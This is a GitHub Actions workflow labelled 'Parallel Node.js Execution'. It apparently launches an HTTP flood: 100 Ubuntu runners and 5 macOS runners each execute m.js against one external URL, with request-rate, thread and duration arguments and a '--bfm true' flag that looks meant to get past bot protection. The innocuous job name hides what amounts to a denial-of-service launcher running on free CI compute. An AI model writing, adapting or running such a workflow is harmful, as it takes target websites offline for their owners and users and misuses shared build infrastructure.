name: Parallel Node.js Execution

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]
  workflow_dispatch:

jobs:
  parallel-execution-ubuntu:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 100
      matrix:
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100]
    
    steps:
      - name: Checkout code
        uses: actions/checkout@v4
      
      - name: Setup Node.js
        uses: actions/setup-node@v4
        with:
          node-version: '20'
          cache: 'npm'
      
      - name: Install dependencies
        run: nnpm install hpack.js chalk hpack
      
      - name: Run m.js
        run: node m.js https://rapidis.gay/6901966783-56ae554b-2273-4326-9e04-803028262101 GET  60 100 1000 --bfm true --debug
        env:
          INSTANCE_NUMBER: ${{ matrix.instance }}
          TOTAL_INSTANCES: 105
          RUNNER_OS: ubuntu

  parallel-execution-macos:
    runs-on: macos-latest
    strategy:
      max-parallel: 5
      matrix:
        instance: [101, 102, 103, 104, 105]
    
    steps:
      - name: Checkout code
        uses: actions/checkout@v4
      
      - name: Setup Node.js
        uses: actions/setup-node@v4
        with:
          node-version: '20'
          cache: 'npm'
      
      - name: Install dependencies
        run: npm ci
      
      - name: Run m.js
        run: node m.js
        env:
          INSTANCE_NUMBER: ${{ matrix.instance }}
          TOTAL_INSTANCES: 105
          RUNNER_OS: macos
